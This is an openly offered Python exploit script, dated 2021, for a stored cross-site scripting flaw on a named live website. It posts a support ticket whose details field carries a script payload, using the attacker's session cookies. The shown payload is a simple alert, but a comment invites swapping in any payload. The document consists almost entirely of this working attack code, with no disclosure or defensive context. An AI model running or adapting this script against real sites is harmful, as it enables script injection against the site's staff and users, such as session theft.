An exploit and demonstration on how to exploit a Stored XSS vulnerability in https://anonstress.com

1. import sys
2. import requests
3.  
4.  
5. # https://anonstress.com Stored XSS Exploit
6. # Date: 09/25/21
7. # Author: 0x1CA3
8.  
9.  
10. class Exploit:
11.     def __init__(self, sesion_cookie, other_cookie):
12.         self.sesion_cookie = sesion_cookie
13.         self.other_cookie = other_cookie
14.         self.title_name = "testone" # The name for the ticket | Note: You can change this.
15.         self.xss_payload = "<script>alert(1)</script>" # Edit your own payload here if you would like.
16.  
17.     def run(self):
18.         site_cookies = {
19.             "31k001c": self.other_cookie,
20.             "fc_session": self.sesion_cookie
21.         }
22.         payload = {
23.             "n3k0t": self.other_cookie,
24.             "title": self.title_name,
25.             "status": "1",
26.             "details": self.xss_payload
27.         }
28.         s = requests.Session()
29.         s.post("https://anonstress.com/support/ticket/create", cookies=site_cookies, data=payload)
30.  
31. def main() -> None:
32.     if len(sys.argv) < 3:
33.         print("Usage: python3 exploit.py <fc_session_cookie> <31k001c_cookie>")
34.         sys.exit()
35.     sesion_cookie = sys.argv[1]
36.     other_cookie = sys.argv[2]
37.     Exploit(sesion_cookie, other_cookie).run()
38.  
39. if __name__ == "__main__":
40.     main()